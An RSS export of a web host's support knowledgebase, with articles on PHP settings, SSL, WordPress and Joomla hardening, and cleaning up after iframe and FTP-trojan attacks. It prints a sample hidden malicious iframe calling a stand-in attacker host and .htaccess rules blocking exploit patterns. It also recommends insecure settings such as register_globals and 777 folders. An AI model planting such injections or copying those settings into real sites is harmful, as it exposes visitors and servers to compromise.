<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" version="2.0">
<channel>
<title><![CDATA[FastWebHost]]></title>
<link><![CDATA[https://support.fastwebhost.com/]]></link>
<description />
<generator><![CDATA[Kayako fusion v4.73.3]]></generator>
<item>
<title><![CDATA[Can I have register globals turned on?]]></title>
<link><![CDATA[https://support.fastwebhost.com/index.php?/Knowledgebase/Article/View/177]]></link>
<guid isPermaLink="false"><![CDATA[96da2f590cd7246bbde0051047b0d6f7]]></guid>
<pubDate><![CDATA[Wed, 18 Feb 2009 09:36:41 -0800]]></pubDate>
<dc:creator><![CDATA[kumar]]></dc:creator>
<description><![CDATA[Yes, just add the following to the .htaccess file located in the public_html folder: php_flag register_globals on]]></description>
<content:encoded><![CDATA[<p>Yes, just add the following to the .htaccess file located in the public_html folder: <br />php_flag register_globals on</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Troubleshooting an IFrame Injection Attack]]></title>
<link><![CDATA[https://support.fastwebhost.com/index.php?/Knowledgebase/Article/View/301]]></link>
<guid isPermaLink="false"><![CDATA[34ed066df378efacc9b924ec161e7639]]></guid>
<pubDate><![CDATA[Sat, 28 Aug 2010 01:10:52 -0700]]></pubDate>
<dc:creator><![CDATA[kumar]]></dc:creator>
<description><![CDATA[IFrame Injection Attack is considered one of the most common and most basic cross site scripting (XSS) attacks. If you have recently got an iframe attack to your website, do not panic. Here are a few things that you can do immediately after you discovered...]]></description>
<content:encoded><![CDATA[<p>IFrame Injection Attack is considered one of the most common and most basic cross site scripting (XSS) attacks. If you have recently got an iframe attack to your website, do not panic. Here are a few things that you can do immediately after you discovered that your website has been a victim of an iframe injection attack.</p>
<p>&lt;iframe src="<a href="http://www.example-hacker-site.com/inject/?s=some-parameters">http://www.example-hacker-site.com/inject/?s=some-parameters</a>" width="1" height="1" style="visibility: hidden"&gt;&lt;/iframe&gt;<br />An example of a malicious IFRAME injection code</p>
<p>1. Take your website down for a certain period<br />It is recommended to take the website down as you do not want to be distributing malware or virus from your website to your visitors. The website should be offline while you are recovering the site.</p>
<p>2. Change all the passwords<br />Although this may seem like a simple step, many people, including myself, often fail to change all the passwords immediately after an attack has been discovered. You need to change all the passwords associated with the website; which include ftp passwords, ssh passwords, account passwords, database passwords, admin passwords and so on.</p>
<p>3. Take a copy of the affected website for further analysis<br />You may want to do a further analysis on the attack and might need to refer to the exact injection source code in the future. Take a copy of the affected website in a compressed format, eg: zip or gzip and store it in an quarantine area for later reference. Note that it is not advisable to keep the affected files on the server.</p>
<p>4. Replace the entire site with a clean backup copy<br />Do not rely on your hosting provider for a backup copy of your site. Many hosting providers say they do an automatic backup every night, however, it is more reliable if you have other backup solutions for your website. Scan your backup copy with Anti-Virus software like ZoneAlarm or Trend Micro (use cupon code trendpro to get 10% Off Trend Micro Internet Security Pro 2010) before uploading to the web server to ensure that the backup copy is free from viruses and Trojan horses.</p>
<p>5. Test the website and reopen<br />This is to make sure that the website is reverted to its clean, original version. Once you are happy with the result, you can reopen the website to the public.</p>
<p>6. Analyse how the attack was originated<br />In order to ensure that the same attack does not happen again, you will need to do a full analysis of the attack and how it was originated. Was it because of a security hole in your application? Was it caused by a weak file permission? Or is your server affected with some virus that injects these code into your website at regular interval? You will need to understand how it happens in order to prevent it in the future. And when necessary, obtain an expert advice.</p>
<p>7. Perform appropriate security measures based on the analysis<br />Although you may have recovered your website, it does not mean your website will not be attacked again. If the same security hole still exists, it is probably very likely that the website will be attacked again in the near future. Therefore, it is recommended that you perform necessary security measures, be it hardening your web server, upgrading an application, or introducing new security restrictions.</p>
<p>Advice about Ifram attacks :-</p>
<p>The common causes seem to be as follows:</p>
<p>* The website is using an old version of an open source application (eg: WordPress 1.0) which has known security issues<br />* File permissions on the server are not set accordingly (eg: every file and folder on the server is set to 777 read-write-execute)<br />* Weakness in an application code. For example, there is not sufficient input validation.<br />* FTP rather than SFTP is used<br />* There is no IP restriction for SSH and FTP accounts</p>
<p>There are a few simple things that can be done to reduce the risk of your website being attacked.</p>
<p>* Change your passwords periodically (say, at least once a month)<br />* Keep your applications up-to-date. Always upgrade immediately when a new version is available.<br />* Clean up files and directories on the web server. Make sure there is no old file with .bak or .txt extensions lying around<br />* Ensure that appropriate file permissions are used for every file and directory on the web server<br />* Consult with a security expert to obtain the best advice</p>
<p>&nbsp;</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[WordPress is giving error: &quot;Missing a temporary folder&quot;  while up...]]></title>
<link><![CDATA[https://support.fastwebhost.com/index.php?/Knowledgebase/Article/View/322]]></link>
<guid isPermaLink="false"><![CDATA[5737c6ec2e0716f3d8a7a5c4e0de0d9a]]></guid>
<pubDate><![CDATA[Mon, 01 Aug 2011 15:37:06 -0700]]></pubDate>
<dc:creator><![CDATA[Rupi]]></dc:creator>
<description><![CDATA[WordPress is giving error on image upload : "image.jpg" has failed to upload due to an error "Missing a temporary folder."If you are receiving this error please follow these simple&nbsp; instructions below:1. Create a "tmp" folder in your WordPress root ...]]></description>
<content:encoded><![CDATA[WordPress is giving error on image upload : "image.jpg" has failed to upload due to an error "Missing a temporary folder."<br /><br />If you are receiving this error please follow these simple&nbsp; instructions below:<br /><br />1. Create a "tmp" folder in your WordPress root directory with <span style="font-weight: bold;">777 </span>permissions. This can be done by your FTP program.<br /><br />2. Also create a "<span style="font-weight: bold;">php.ini</span>" file in same location.<br /><br />3. Add the following in php.ini file:<br /><br /><span style="font-weight: bold;">upload_max_filesize = 16M</span><br style="font-weight: bold;" /><span style="font-weight: bold;">upload_tmp_dir = on</span><br style="font-weight: bold;" /><span style="font-weight: bold;">upload_tmp_dir = /home/username/public_html/wordpressDir/tmp</span><br /><br />Please make sure to replace username with your hosting username, and <span style="font-weight: bold;">wordpressDir</span> with the directory name of your WordPress install. <br />If you have installed WordPress on your homepage then the path will be like: <span style="font-weight: bold;">upload_tmp_dir = /home/username/public_html/tmp<br /><br /></span>4. Copy the same php.ini file to your <span style="font-weight: bold;">wp_admin </span>folder.<br /><br />That's it.<br />]]></content:encoded>
</item>
<item>
<title><![CDATA[How to enable: allow_url_fopen]]></title>
<link><![CDATA[https://support.fastwebhost.com/index.php?/Knowledgebase/Article/View/328]]></link>
<guid isPermaLink="false"><![CDATA[cd00692c3bfe59267d5ecfac5310286c]]></guid>
<pubDate><![CDATA[Mon, 11 Jun 2012 17:56:40 -0700]]></pubDate>
<dc:creator />
<description><![CDATA[This can be done via your php.ini file by adding the following line:
allow_url_fopen = On
The php.ini file is where you declare changes to your PHP settings. You can edit the existing php.ini, or create a new text file in any subdirectory and name it ph...]]></description>
<content:encoded><![CDATA[<p>This can be done via your php.ini file by adding the following line:</p>
<div class="look_here"><span style="background-color: #ffff99;">allow_url_fopen = On</span></div>
<p>The php.ini file is where you declare changes to your PHP settings. You can edit the existing php.ini, or create a new text file in any subdirectory and name it php.ini.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Can we install SSL for Addon domains?]]></title>
<link><![CDATA[https://support.fastwebhost.com/index.php?/Knowledgebase/Article/View/329]]></link>
<guid isPermaLink="false"><![CDATA[6faa8040da20ef399b63a72d0e4ab575]]></guid>
<pubDate><![CDATA[Wed, 20 Jun 2012 12:17:42 -0700]]></pubDate>
<dc:creator />
<description><![CDATA[Yes, we can install SSL for an Addon domain name.
Every SSL certificate requires a domain name and a dedicated IP address. Shared web hosting accounts can host multiple domains, but all of the domains share the same IP address. We can only assign one IP ...]]></description>
<content:encoded><![CDATA[<p>Yes, we can install SSL for an Addon domain name.</p>
<p>Every SSL certificate requires a domain name and a dedicated IP address. Shared web hosting accounts can host multiple domains, but all of the domains share the same IP address. We can only assign one IP address per account, therefore we can only allow one private SSL certificate per cPanel.</p>
<p>If you need multiple SSL certificates or multiple IP addresses, please purchase a reseller account or multiple shared web hosting accounts.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[WordPress Security]]></title>
<link><![CDATA[https://support.fastwebhost.com/index.php?/Knowledgebase/Article/View/348]]></link>
<guid isPermaLink="false"><![CDATA[01386bd6d8e091c2ab4c7c7de644d37b]]></guid>
<pubDate><![CDATA[Fri, 22 Feb 2013 13:11:45 -0800]]></pubDate>
<dc:creator />
<description><![CDATA[Wordpress Security
Wordpress is being used by a lots of users as it is user-friendly in developing sites and is available free of cost. Despite these advantage it has many loopholes that cannot be ignored. Wordpress team is continuously working and bringi...]]></description>
<content:encoded><![CDATA[<h3><strong>Wordpress Security</strong></h3>
<p>Wordpress is being used by a lots of users as it is user-friendly in developing sites and is available free of cost. Despite these advantage it has many loopholes that cannot be ignored. Wordpress team is continuously working and bringing forth new versions to the market but still the vulnerabilites are increasing every day on the internet. Some of the security loopholes in wordpress sites are as given below :<br /><br />1) Without-charge WordPress themes have security issues<br />2) WordPress&rsquo;s default login is unsafe<br />3) It is vulnerable to URL hacking and other security attacks<br /><br />Steps to decrease Vulnerablilites<br />=================================<br />1) Moving wp-config.php file:<br /><br />wp-config.php is the most inportant file in wordpress which you need to protect from being accessed directly so instead of keeping it in public_html folder you can move it one folder back. Below are the steps.<br /><br />STEP 1: Download your wp-config.php file to local computer.<br /><br />STEP 2: Now upload this file to any folder just one level above public-html or www folders. In short you have to upload it outside to public-html folder (if you have installed WordPress in root).<br /><br />STEP 3: Now open your original wp-config.php (old) file and replace everything inside it with this code.<br /><br />======================<br />&lt;?php<br /> include('/home/username/wp-config.php');<br />?&gt;<br />======================<br /><br />2) Stop directory listing:<br /><br />By default any readable folder that is not having index file lists all the files inside when browsed. To avoid listing your files you can create index files in all the readable folders. Here is a better, more trusted and less time consuming solution. Just open your .htaccess file and add this code anywhere within it.<br /><br />=====================<br />IndexIgnore *<br />=====================<br /><br />You need to go through the below url for further details on securing wordpress site<br />============<br /><a href="http://codex.wordpress.org/Hardening_WordPress">http://codex.wordpress.org/Hardening_WordPress</a><br />============</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Secure your joomla site]]></title>
<link><![CDATA[https://support.fastwebhost.com/index.php?/Knowledgebase/Article/View/349]]></link>
<guid isPermaLink="false"><![CDATA[0bb4aec1710521c12ee76289d9440817]]></guid>
<pubDate><![CDATA[Sat, 23 Feb 2013 14:28:05 -0800]]></pubDate>
<dc:creator />
<description><![CDATA[Tips to secure your joomla site
Securing your site is rather easy, if you know what, where, and how it needs to be completed. This article may only scratch the surface, but will provide you with enough advice to perform a major upgrade in your site&rsquo;...]]></description>
<content:encoded><![CDATA[<h2 id="post-53">Tips to secure your joomla site</h2>
<p>Securing your site is rather easy, if you know what, where, and how it needs to be completed. This article may only scratch the surface, but will provide you with enough advice to perform a major upgrade in your site&rsquo;s security in a few, easy steps.</p>
<h4><br />1. Change the default database prefix (jos_)</h4>
<p>Most SQL injections that are written to hack a Joomla! website, try to retrieve data from the jos_users table. This way, they can retrieve the username and password from the super administrator of the website. Changing the default prefix into something random, will prevent (most / all) SQL injections.<br /><br />You can set the database prefix when installing your Joomla! website. If you've already installed Joomla! and want to change your prefix, do the following:<br />&nbsp;&nbsp; * Log on to your Joomla! back-end.<br />&nbsp;&nbsp; * Go to your global configuration and search for the database<br />&nbsp;&nbsp; * Change your database prefix (Example: fdasqw_) and press Save.<br />&nbsp;&nbsp; * Go to phpMyAdmin to access your database.<br />&nbsp;&nbsp; * Go to export, leave all default values and press Start. Exporting the database can take a while.<br />&nbsp;&nbsp; * When done, select all code and copy it to notepad (or any other text editor)<br />&nbsp;&nbsp; * In phpMyAdmin, select all tables and delete them<br />&nbsp;&nbsp; * In notepad, do a Search &amp; replace (Ctrl + H). Set the searchterm to jos_ and change it into your new prefix (Example: fdasqw_). Press "Replace all".<br />&nbsp;&nbsp; * Select everything in your notepad file and copy it. In phpMyAdmin, go to SQL, paste the queries and press Start.<br /><br /><strong>2. Remove version number / name of extensions</strong></p>
<p>Most vulnerabilities only occur in a specific release of a specific extension. Showing MyExtension version 2.14 is a really bad thing. You can modify this message to only the name of the extension by doing the following:<br /><br />&nbsp;&nbsp;&nbsp; * Retrieve all files of the extension from your server.<br />&nbsp;&nbsp;&nbsp; * Open up Dreamweaver.<br />&nbsp;&nbsp;&nbsp; * Load any file from the extension that you just downloaded to your local machine.<br />&nbsp;&nbsp;&nbsp; * Use the Search function and set the search to Search through specified folder. Navigate to the folder where you downloaded the exploit to.<br />&nbsp;&nbsp;&nbsp; * Set the search term to "MyExtension version 2.14" and press OK.<br />&nbsp;&nbsp;&nbsp; * When found the correct file, remove the version number.<br />&nbsp;&nbsp;&nbsp; * Upload the changed file to your server and check if the changes are made.<br /><br /><strong>3. Use a SEF component</strong></p>
<p>Most hackers use the Google inurl: command to search for a vulnerable exploit. Use Artio, SH404SEF or another SEF component to re-write your URL's and prevent hackers from finding the exploits.<br /><br />Additionally, you'll get a higher rank in Google when using search engine friendly URL's.<br /><br /><strong>4. Keep Joomla! and extensions up to date</strong></p>
<p>This one is pretty obvious. Always check for the latest versions of Joomla! and the extensions you're using. Many vulnerabilities are resolved most of the times in later versions.<br /><br /><strong>5. Use the correct CHMOD for each folder and file</strong></p>
<p>Setting files or folders to a CHMOD of 777 or 707 is only necessary when a script needs to write to that file or directory. All other files should have the following configuration:<br /><br />&nbsp;&nbsp;&nbsp; PHP files: 644<br />&nbsp;&nbsp;&nbsp; Other folders: 755<br /><br /><strong>6. Delete leftover files</strong></p>
<p>When you installed an extension that you didn't like, don't set the extension to unbublished. If you do, the vulnerable files will still be on your website. So simply use the un-install function to totally get rid of the extension.<br /><br /><strong>7. Change your .htaccess file</strong></p>
<p>Add the following lines to your .htaccess file to block out some common exploits.<br /><br />Open your .htaccess file<br />########## Begin - Rewrite rules to block out some common exploits<br />#<br /># Block out any script trying to set a mosConfig value through the URL<br /><em>RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|%3D) [OR]</em><br /># Block out any script trying to base64_encode crap to send via URL<br /><em>RewriteCond %{QUERY_STRING} base64_encode.*(.*) [OR]</em><br /># Block out any script that includes a &lt; script&gt; tag in URL<br /><em>RewriteCond %{QUERY_STRING} (&lt;|%3C).*script.*(&gt;|%3E) [NC,OR]</em><br /># Block out any script trying to set a PHP GLOBALS variable via URL<br /><em>RewriteCond %{QUERY_STRING} GLOBALS(=|[|%[0-9A-Z]{0,2}) [OR]</em><br /># Block out any script trying to modify a _REQUEST variable via URL<br /><em>RewriteCond %{QUERY_STRING} _REQUEST(=|[|%[0-9A-Z]{0,2}) [OR]</em><br /># Block out any script that tries to set CONFIG_EXT (com_extcal2 issue)<br /><em>RewriteCond %{QUERY_STRING} CONFIG_EXT([|%20|%5B).*= [NC,OR]</em><br /># Block out any script that tries to set sbp or sb_authorname via URL (simpleboard)<br /><em>RewriteCond %{QUERY_STRING} sbp(=|%20|%3D) [OR]</em><br /><em>RewriteCond %{QUERY_STRING} sb_authorname(=|%20|%3D)</em><br /># Send all blocked request to homepage with 403 Forbidden error!<br /><em>RewriteRule ^(.*)$ index.php [F,L]</em><br />#<br />########## End - Rewrite rules to block out some common exploits<br /><br /><br /></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Reporting Site Attack]]></title>
<link><![CDATA[https://support.fastwebhost.com/index.php?/Knowledgebase/Article/View/382]]></link>
<guid isPermaLink="false"><![CDATA[4f6ffe13a5d75b2d6a3923922b3922e5]]></guid>
<pubDate><![CDATA[Wed, 04 Feb 2015 11:03:51 -0800]]></pubDate>
<dc:creator />
<description><![CDATA[This is a concern to many of us Hosters and after some in-depth research, it would seem the most likely cause is that your personal computer is infected. Strange as that may sound, hackers are using a variation of Trojans to infect personal computers and ...]]></description>
<content:encoded><![CDATA[<p>This is a concern to many of us Hosters and after some in-depth research, it would seem the most likely cause is that your personal computer is infected. Strange as that may sound, hackers are using a variation of Trojans to infect personal computers and then use your own FTP login information, to change the Index page and/or other targeted pages on your own site. Therefore we request you to scan your<br />computer with a good anti-virus for infected files. Also use Internet protection tools.<br /><br />if you don't, you can have computer checked for viruses for free - using the free HouseCall from TrendMicro (http://housecall.trendmicro.com/). They are a very respected company when dealing with Virus related problems. You can feel secure in using their HouseCall program to access/clean your computer.<br /><br />Once you done that please delete files under public_html and upload them again. <br /><br /><strong>Steps to follow:</strong><br /><br />Step 1: Install a new anti-virus program. Obviously this virus knows how to evade detection of the current anti-virus. It doesn't matter what's being used currently, you have to install something different.<br />Step 2: Login to your control and change your FTP password. Write it down at this point DO NOT ACCESS YOUR SITE with FTP until you finish all of these steps.<br />Step 3: Scan and clean every PC that has FTP access to your site. This is also a must. Otherwise you have no idea who's PC it is. Do not give the new FTP passwords to anyone until after you have finished all of these steps.<br />Step 4: Remove the malicious code from your webpages. If you have a known good back-up, use that. If not, download your site (yes you'll have to type in the new password, but hopefully you're already scanned and cleaned your PC). Then open each file in your HTML editor and find the infectious code. This particular malscript usually hides immediately after the opening body tag, but we've also seen it at the end of files. You'll have to check every file on your website not just index files or just html files. Check every file on your website even .js and .css files.<br />Step 5: Change your FTP passwords again.<br />Step 6: Please request a delisting through your Google Webmaster account. This is not something that Team of FastWebHost can do for you. The excerpt below was copied from Google, and gives you step by step instructions to request a delisting.<br />&nbsp;<br /><strong>http://www.google.com/support/webmasters/bin/answer.py?answer=45432</strong><br />Once you have reviewed your site and are sure it is clean, you can can submit a request for review. Note, you will need to verify site ownership before you can request a site review.<br />&nbsp;&nbsp;&nbsp; Sign in to Webmaster Tools with your Google account.<br />&nbsp;&nbsp;&nbsp; On the Dashboard, select the site you want.<br />&nbsp;&nbsp;&nbsp; On the Overview page, click Request a review and follow the instructions.<br />Then you should have that issue again.<br />This is not the result of a faulty script or weak FTP passwords. It's the result of a virus on PC with FTP access to the infected website<br /><br /></p>]]></content:encoded>
</item>
</channel>
</rss>